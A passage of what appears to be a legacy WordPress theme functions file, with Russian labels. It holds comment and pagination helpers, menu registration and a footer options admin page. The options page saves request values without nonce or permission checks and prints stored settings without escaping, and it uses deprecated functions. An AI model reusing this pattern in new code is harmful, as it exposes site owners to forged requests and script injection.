	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Подвал</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
